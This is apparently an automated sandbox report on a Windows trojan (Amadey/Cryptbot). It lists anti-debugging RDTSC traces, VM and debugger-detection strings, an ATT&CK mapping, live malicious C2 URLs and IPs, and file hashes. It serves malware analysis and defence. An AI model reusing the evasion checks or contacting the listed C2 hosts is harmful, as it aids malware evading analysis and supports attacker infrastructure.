Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B00C0 second address: 71B0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c jmp 00007F78B9095CEEh 0x00000011 sub esp, 44h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B9095CF7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0102 second address: 71B0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 23B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F78B909B0FFh 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007F78B909B109h 0x0000001d adc cx, 8FC6h 0x00000022 jmp 00007F78B909B101h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0155 second address: 71B0165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0278 second address: 71B02F9 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a mov dword ptr [esp+24h], 00000000h 0x00000012 jmp 00007F78B909B107h 0x00000017 lock bts dword ptr [edi], 00000000h 0x0000001c jmp 00007F78B909B106h 0x00000021 jc 00007F792961D26Dh 0x00000027 pushad 0x00000028 mov al, 4Fh 0x0000002a pushfd 0x0000002b jmp 00007F78B909B103h 0x00000030 jmp 00007F78B909B103h 0x00000035 popfd 0x00000036 popad 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov dx, 2596h 0x0000003f mov eax, edx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B02F9 second address: 71B031C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B031C second address: 71B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0320 second address: 71B0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0324 second address: 71B032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B032A second address: 71B0360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, C7h 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F78B9095CF9h 0x00000011 mov esp, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F78B9095CEDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E07F1 second address: 71E07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E07F5 second address: 71E07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E07FB second address: 71E081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, dh 0x0000000f mov di, ax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E081D second address: 71E08A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF1h 0x00000009 and ecx, 5915B2F6h 0x0000000f jmp 00007F78B9095CF1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F78B9095CF9h 0x00000022 jmp 00007F78B9095CEBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F78B9095CF8h 0x0000002e add ecx, 1AFD95A8h 0x00000034 jmp 00007F78B9095CEBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E08A3 second address: 71E08A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E08A9 second address: 71E08D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B9095CF5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E08D2 second address: 71E08D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E08D8 second address: 71E08DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E08DC second address: 71E091A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov di, 2A68h 0x0000000f jmp 00007F78B909B101h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F78B909B108h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E091A second address: 71E091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E091E second address: 71E0924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E0924 second address: 71E092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E092A second address: 71E092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Special instruction interceptor: First address: E9F99C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Special instruction interceptor: First address: 104FA2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00959980 rdtsc 0_2_00959980
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_007729FF
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: jklg6EIhyR.exe | Binary or memory string: Hyper-V RAW
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: jklg6EIhyR.exe, 00000000.00000003.1414942266.0000000001862000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414747934.0000000001861000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414624645.0000000001854000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431707907.0000000001866000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414990007.0000000001865000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File opened: NTICE
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File opened: SICE
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Process queried: DebugPort (3 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Code function: 0_2_00959980 rdtsc 0_2_00959980
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (4 occurrences)
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49701 -> 185.121.15.192:80
MITRE ATT&CK Matrix (tactic: techniques; the number in front of a technique is the count shown in the report)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
jklg6EIhyR.exe | 51% | Virustotal |
jklg6EIhyR.exe | 71% | ReversingLabs | Win32.Trojan.Amadey
jklg6EIhyR.exe | 100% | Avira | TR/Crypt.TPM.Gen
jklg6EIhyR.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1 | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1 | jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://httpbin.org/ipbefore | jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | jklg6EIhyR.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html | jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850 | jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.twentytk20ht.top | Spain | 207046 | REDSERVICIOES | false
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580914
Start date and time: 2024-12-26 13:06:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: jklg6EIhyR.exe (renamed because original name is a hash value)
Original Sample Name: bec048b8a886ac4f2f72a47a41057f6d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | qr2JeuLuOQ.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | E6rBvcWFWu.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | gDPzgKHFws.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | fivetk5sb.top/v1/upload.php
185.121.15.192 | 8kl5nJ3f9x.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | twentytk20ht.top/v1/upload.php
185.121.15.192 | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | fivetk5sb.top/v1/upload.php
185.121.15.192 | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
34.226.108.155 | qr2JeuLuOQ.exe | malicious | Unknown |
34.226.108.155 | gDPzgKHFws.exe | malicious | Cryptbot |
34.226.108.155 | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | nRYpZg6i5E.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | RGU8qibimk.exe | malicious | Clipboard Hijacker, Cryptbot |
34.226.108.155 | FMuiLqyqaT.exe | malicious | Clipboard Hijacker, Cryptbot |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
httpbin.org | gDPzgKHFws.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 8kl5nJ3f9x.exe | malicious | Cryptbot | 98.85.100.80
httpbin.org | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
httpbin.org | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
httpbin.org | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
home.twentytk20ht.top | qr2JeuLuOQ.exe | malicious | Unknown | 185.121.15.192
home.twentytk20ht.top | E6rBvcWFWu.exe | malicious | Unknown | 185.121.15.192
home.twentytk20ht.top | gDPzgKHFws.exe | malicious | Cryptbot | 185.121.15.192
home.twentytk20ht.top | 8kl5nJ3f9x.exe | malicious | Cryptbot | 185.121.15.192
home.twentytk20ht.top | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
home.twentytk20ht.top | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
home.twentytk20ht.top | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
home.twentytk20ht.top | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
home.twentytk20ht.top | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
home.twentytk20ht.top | nRYpZg6i5E.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
Match | Associated Sample Name / URL | Detection | Threat Name | Context
REDSERVICIOES | qr2JeuLuOQ.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | E6rBvcWFWu.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | gDPzgKHFws.exe | malicious | Cryptbot | 185.121.15.192
REDSERVICIOES | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | 8kl5nJ3f9x.exe | malicious | Cryptbot | 185.121.15.192
REDSERVICIOES | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
AMAZON-AESUS | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | xd.mips.elf | malicious | Mirai | 34.206.168.77
AMAZON-AESUS | xd.x86.elf | malicious | Mirai | 44.213.56.197
AMAZON-AES�S | telnet.arm.elf | malicious | Unknown | 18.209.195.84
AMAZON-AESUS | telnet.sh4.elf | malicious | Unknown | 35.175.156.177
AMAZON-AESUS | armv5l.elf | malicious | Mirai | 44.206.15.113
AMAZON-AESUS | https://fsharetv.co/ | malicious | Unknown | 54.225.185.110
AMAZON-AESUS | armv6l.elf | malicious | Mirai | 18.233.118.120
AMAZON-AESUS | armv6l.elf | malicious | Unknown | 54.46.167.194
                                                  No context
                                                  No context
                                                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.979674919342304
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: jklg6EIhyR.exe
File size: 4'495'872 bytes
MD5: bec048b8a886ac4f2f72a47a41057f6d
SHA1: 19ad6894a66b4a5fec94097dc8e34ae6d599b1c2
SHA256: b791f8f262d7c1436a8132fdcc6b578095e490ad531600b829af4c9095d53955
SHA512: fd606339d69f83970cb99578ead4ecfb0d65c14a221aeb863e61efa5ecb7d9793d683dde537f5961310ad5027e0733ba0a72f27d49617fb4813d02382b075642
SSDEEP: 98304:Oo5+SnsgZSfKsfEIbDAv8A3V1kDBc902IpoakOd:Oo5+SofxfdDC7n4MkRkO
TLSH: A4263313FA319E58FED768345C9536C4E2C9C3CBA861D704B1678BC64CD868B85B34AB
